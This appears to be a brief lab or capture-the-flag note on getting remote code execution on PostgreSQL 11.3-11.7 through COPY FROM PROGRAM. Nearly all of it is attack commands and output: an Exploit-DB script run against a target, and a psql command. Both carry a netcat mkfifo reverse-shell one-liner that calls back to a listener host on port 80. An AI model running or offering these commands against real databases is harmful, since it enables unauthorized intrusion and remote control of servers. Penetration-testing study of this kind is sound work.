PostgreSQL DB 11.3 - 11.7
I was able to execute commands but I was never able to get a reverse shell until I read this article here.
python /usr/share/exploitdb/exploits/multiple/remote/50847.py -i 192.168.143.47 -p 5437 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.143 80 >/tmp/f'
[+] Connecting to PostgreSQL Database on 192.168.143.47:5437
[+] Connection to Database established
[+] Checking PostgreSQL version
[+] PostgreSQL 11.7 is likely vulnerable
[+] Creating table _2dd6b3f0887b2a35a68630f8de3d4c67
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.143 80 >/tmp/f
This got me remote code execution as well as creating a table and getting a shell using the exact same method.
postgres=# COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.143 80 >/tmp/f';COPY 0
